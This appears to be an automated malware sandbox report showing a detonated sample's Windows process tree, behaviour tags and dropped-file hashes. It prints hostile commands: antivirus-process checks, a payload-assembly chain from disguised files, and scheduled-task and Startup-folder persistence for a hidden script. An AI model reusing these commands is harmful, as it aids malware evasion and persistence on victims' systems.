                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4064 /prefetch:2
                                                                                                                            8⤵
                                                                                                                              PID:4160
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4140 /prefetch:2
                                                                                                                              8⤵
                                                                                                                                PID:5576
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4340 /prefetch:2
                                                                                                                                8⤵
                                                                                                                                  PID:6824
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3736 /prefetch:2
                                                                                                                                  8⤵
                                                                                                                                    PID:6640
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 948
                                                                                                                                6⤵
                                                                                                                                • Program crash
                                                                                                                                PID:6516
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10126740101\HmngBpR.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10126740101\HmngBpR.exe"
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:6604
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe
                                                                                                                                6⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:7036
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exe
                                                                                                                                  7⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                  PID:384
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    8⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:5376
                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      9⤵
                                                                                                                                        PID:6076
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10126750101\FvbuInU.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10126750101\FvbuInU.exe"
                                                                                                                                5⤵
                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                • Checks BIOS information in registry
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:5984
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10126760101\ADFoyxP.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10126760101\ADFoyxP.exe"
                                                                                                                                5⤵
                                                                                                                                  PID:6052
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                                                                                                                                    6⤵
                                                                                                                                      PID:6660
                                                                                                                                      • C:\Windows\SysWOW64\expand.exe
                                                                                                                                        expand Go.pub Go.pub.bat
                                                                                                                                        7⤵
                                                                                                                                          PID:6488
                                                                                                                                        • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                          tasklist
                                                                                                                                          7⤵
                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                          PID:7084
                                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                          findstr /I "opssvc wrsa"
                                                                                                                                          7⤵
                                                                                                                                            PID:5020
                                                                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                            tasklist
                                                                                                                                            7⤵
                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                            PID:2204
                                                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                            findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                                                                                                                                            7⤵
                                                                                                                                              PID:2264
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /c md 353090
                                                                                                                                              7⤵
                                                                                                                                                PID:4504
                                                                                                                                              • C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                extrac32 /Y /E Really.pub
                                                                                                                                                7⤵
                                                                                                                                                  PID:3688
                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                  findstr /V "posted" Good
                                                                                                                                                  7⤵
                                                                                                                                                    PID:5812
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
                                                                                                                                                    7⤵
                                                                                                                                                      PID:5828
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
                                                                                                                                                      7⤵
                                                                                                                                                        PID:6392
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\353090\Seat.com
                                                                                                                                                        Seat.com m
                                                                                                                                                        7⤵
                                                                                                                                                          PID:6564
                                                                                                                                                        • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                          choice /d y /t 5
                                                                                                                                                          7⤵
                                                                                                                                                            PID:6536
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe"
                                                                                                                                                        5⤵
                                                                                                                                                          PID:6604
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:6076
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:6084
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 928
                                                                                                                                                                6⤵
                                                                                                                                                                • Program crash
                                                                                                                                                                PID:6080
                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10126780141\ogfNbjS.ps1"
                                                                                                                                                              5⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:5292
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10126790101\CgmaT61.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10126790101\CgmaT61.exe"
                                                                                                                                                              5⤵
                                                                                                                                                                PID:7116
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2R0700.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2R0700.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                            • Downloads MZ/PE file
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                            PID:3132
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              PID:2460
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3E11p.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3E11p.exe
                                                                                                                                                          2⤵
                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          PID:776
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 856 -ip 856
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2812
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                          1⤵
                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          PID:2508
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                          1⤵
                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                          PID:6140
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3440 -ip 3440
                                                                                                                                                          1⤵
                                                                                                                                                            PID:3132
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                            1⤵
                                                                                                                                                              PID:6764
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                              1⤵
                                                                                                                                                                PID:2072
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1240
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6604 -ip 6604
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:6100
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4928
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:1296
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:5928

                                                                                                                                                                      Network

                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                      Replay Monitor

                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                      Downloads

                                                                                                                                                                      • C:\Program Files\runtime\COM Surrogate.exe

                                                                                                                                                                        Filesize

                                                                                                                                                                        3.9MB

                                                                                                                                                                        MD5

                                                                                                                                                                        37e4db9e1d41f6b2946439c86b90f179

                                                                                                                                                                        SHA1

                                                                                                                                                                        89c73870f4cf47c1081b9feb6931d1a125a0bf44

                                                                                                                                                                        SHA256

                                                                                                                                                                        e1892e2e2ae4c06f9d9608162cddf7e288ba3fa83ba944293f8b2783f17ef0d6

                                                                                                                                                                        SHA512

                                                                                                                                                                        9b14d226009ac99d3dbb98609a68b447a742e0645d8fdb8836877cfa1594409bb77f75b8725fd79c29e26629670ac3e4fe5eeab6f8565fdfb7ce181eb2ae163d

                                                                                                                                                                      • C:\ProgramData\mozglue.dll

                                                                                                                                                                        Filesize

                                                                                                                                                                        593KB

                                                                                                                                                                        MD5

                                                                                                                                                                        c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                        SHA1

                                                                                                                                                                        95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                        SHA256

                                                                                                                                                                        ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                        SHA512

                                                                                                                                                                        fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                      • C:\ProgramData\pz5pz\kf37qi

                                                                                                                                                                        Filesize

                                                                                                                                                                        114KB

                                                                                                                                                                        MD5

                                                                                                                                                                        b28c7f7cff15a860603a1d6523afb720

                                                                                                                                                                        SHA1

                                                                                                                                                                        281af1b07b39c5b75f451d2d86bfd07b42054c39

                                                                                                                                                                        SHA256

                                                                                                                                                                        3df169b8995f5d21eefd5f2c1edb3a15f51dcaae38c2d16d1050b3c884c71f14

                                                                                                                                                                        SHA512

                                                                                                                                                                        f80e505c77286abb99aa03a3f25510cf0eb092892adb2fb02add9011c85362c8d215cd1225bc73a582f4b149bdedcbb1379ae1d48d320cc535cf20710be89af3

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        40B

                                                                                                                                                                        MD5

                                                                                                                                                                        05347574d072059398ca8469139546b5

                                                                                                                                                                        SHA1

                                                                                                                                                                        b0ea682e2cf912e316e457364b5ae91ae428ed6d

                                                                                                                                                                        SHA256

                                                                                                                                                                        373210dcebacba9ff6058df3564f518f77243a7ce14117114dc62ff6da65b8e0

                                                                                                                                                                        SHA512

                                                                                                                                                                        51e8d6441b4ff135fc0ac43b236dc80d3cf6bc536408138525073e570a2f4c2f10958e7b34cc100032aafc9209e526632c738295f6718f9f3358005aa197caf7

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                                                                        Filesize

                                                                                                                                                                        649B

                                                                                                                                                                        MD5

                                                                                                                                                                        355a483429d1666adff6c0b41f016d50

                                                                                                                                                                        SHA1

                                                                                                                                                                        bed2c854889947efa74ed193c2face1db7f3cf07

                                                                                                                                                                        SHA256

                                                                                                                                                                        df75ce4d3b256b3b3ffb75edae8f7560a50dc495a863d04736a69a24d772140d

                                                                                                                                                                        SHA512

                                                                                                                                                                        e2a5c0b71d03792e353585334b7dc0c53467c6ecf522c4f6849c2b4d66649e8c1d5c2e09b9bfa83b297a9d4abe20182f776301f7821c4a9e8515150b6edae6df

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

                                                                                                                                                                        Filesize

                                                                                                                                                                        851B

                                                                                                                                                                        MD5

                                                                                                                                                                        07ffbe5f24ca348723ff8c6c488abfb8

                                                                                                                                                                        SHA1

                                                                                                                                                                        6dc2851e39b2ee38f88cf5c35a90171dbea5b690

                                                                                                                                                                        SHA256

                                                                                                                                                                        6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

                                                                                                                                                                        SHA512

                                                                                                                                                                        7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

                                                                                                                                                                        Filesize

                                                                                                                                                                        854B

                                                                                                                                                                        MD5

                                                                                                                                                                        4ec1df2da46182103d2ffc3b92d20ca5

                                                                                                                                                                        SHA1

                                                                                                                                                                        fb9d1ba3710cf31a87165317c6edc110e98994ce

                                                                                                                                                                        SHA256

                                                                                                                                                                        6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                                                                                                                                                        SHA512

                                                                                                                                                                        939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                        Filesize

                                                                                                                                                                        2B

                                                                                                                                                                        MD5

                                                                                                                                                                        d751713988987e9331980363e24189ce

                                                                                                                                                                        SHA1

                                                                                                                                                                        97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                        SHA256

                                                                                                                                                                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                        SHA512

                                                                                                                                                                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                        SHA1

                                                                                                                                                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                        SHA256

                                                                                                                                                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                        SHA512

                                                                                                                                                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        def65711d78669d7f8e69313be4acf2e

                                                                                                                                                                        SHA1

                                                                                                                                                                        6522ebf1de09eeb981e270bd95114bc69a49cda6

                                                                                                                                                                        SHA256

                                                                                                                                                                        aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

                                                                                                                                                                        SHA512

                                                                                                                                                                        05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

                                                                                                                                                                        Filesize

                                                                                                                                                                        150B

                                                                                                                                                                        MD5

                                                                                                                                                                        26b73fff8dea7c25bafe9229c9223239

                                                                                                                                                                        SHA1

                                                                                                                                                                        199bb083379c98f59448645320dd644967b1d17c

                                                                                                                                                                        SHA256

                                                                                                                                                                        cd852dc4f9433ecf44dd68f14bc8f96b506c6767df2e4213bce828cc9a8a6095

                                                                                                                                                                        SHA512

                                                                                                                                                                        7b0193963a70c3e2286a59fe6095438968e80e0d05c79bc43ed254f375940a261618f64acd8d34452e043f8f9b0e2d3c8edaecd70889284405146c4dfb7b0ca1

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

                                                                                                                                                                        Filesize

                                                                                                                                                                        284B

                                                                                                                                                                        MD5

                                                                                                                                                                        560addcb793a1611687305eb8ef4cac8

                                                                                                                                                                        SHA1

                                                                                                                                                                        fc2a277b1451dc8724b97271900294183ad72f96

                                                                                                                                                                        SHA256

                                                                                                                                                                        a49df309bcf554702070a46df9b969f8321b1058b2368771097fddba3bf586f4

                                                                                                                                                                        SHA512

                                                                                                                                                                        c03a475cee80b3ab1736f553470a67c3d61ed0fced9543fc4b30b3ad3ba8d6bc8cd92d0652d4ab2ca66d74693d7c471c529618532eb3b8ab535f3c58950427b1

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\02b6c164-5ad3-494b-a06b-7d7c9cffcea8.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.4MB

                                                                                                                                                                        MD5

                                                                                                                                                                        edb26181f81823ad4b3f2aa8c8782b03

                                                                                                                                                                        SHA1

                                                                                                                                                                        93cab9a4d9ccd4dfe469da24c03f7e4575cb9fd5

                                                                                                                                                                        SHA256

                                                                                                                                                                        b6139d755d2f05c202fc71b677d523dd3e6b69420903b33af02a379ee324cc11

                                                                                                                                                                        SHA512

                                                                                                                                                                        c29c1435e9343e6098a53b561dbec85f5ac93e0bac297cb575b18aa1487abcabe109c789dbc3487b47f803e7b0367c00c9f330fbdd1bcf3d3b15f0e2cbe6ea1c

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b7b0cd31-08ab-4f74-8df9-ca9c589ac337.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.5MB

                                                                                                                                                                        MD5

                                                                                                                                                                        00ed1cd5960ac182fc0a72b78b147f60

                                                                                                                                                                        SHA1

                                                                                                                                                                        6a3739540f3888e8e7f0e9cb9a61836e56095657

                                                                                                                                                                        SHA256

                                                                                                                                                                        06ee8d909bc8d7a8a161323712c0fd3fbd393bd55b97a0022fb55149730f96cd

                                                                                                                                                                        SHA512

                                                                                                                                                                        262694046f4e25b4c31486ef808af68db307be3d71962d1a90fabaadb20f8f10cc303a86f4f2f4961d679c1e1de29099e11b0db3c14ea150b8d73c3d0e2d9cd3

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        94bd9c36e88be77b106069e32ac8d934

                                                                                                                                                                        SHA1

                                                                                                                                                                        32bd157b84cde4eaf93360112d707056fc5b0b86

                                                                                                                                                                        SHA256

                                                                                                                                                                        8f49a43a08e2984636b172a777d5b3880e6e82ad25b427fef3f05b7b4f5c5b27

                                                                                                                                                                        SHA512

                                                                                                                                                                        7d4933fae6a279cc330fde4ae9425f66478c166684a30cec9c5c3f295289cf83cbdf604b8958f6db64b0a4b1566db102fbcbdcdb6eca008d86d9a9c8b252ff16

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        25f87986bcd72dd045d9b8618fb48592

                                                                                                                                                                        SHA1

                                                                                                                                                                        c2d9b4ec955b8840027ff6fd6c1f636578fef7b5

                                                                                                                                                                        SHA256

                                                                                                                                                                        d8b542281740c12609279f2549f85d3c94e6e49a3a2a4b9698c93cca2dce486c

                                                                                                                                                                        SHA512

                                                                                                                                                                        0c8a0d1a3b0d4b30773b8519a3d6e63d92973733da818ca9838599a9639e18df18ce31ebf56f46f6bbb7d89d10c726f4d73781e154d115a6068a3be7dd12b314

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        3f924426dc6a4ac978a90931d0dd07b6

                                                                                                                                                                        SHA1

                                                                                                                                                                        9fc53870215681057bc3d8a2354eb4a426613f46

                                                                                                                                                                        SHA256

                                                                                                                                                                        a26eb568c2342d8bdfbcdd2d017ef86f94e18475ea4d5cb7948cce79f593f6e2

                                                                                                                                                                        SHA512

                                                                                                                                                                        e9873cdee570cb9b3d7df96b422f1a34925484ead0ae0522bd4dfebbf420c7036b650145462e1dac7f744daeed889f53ed0ee250a8d3030d81e9f26d3269fbd1

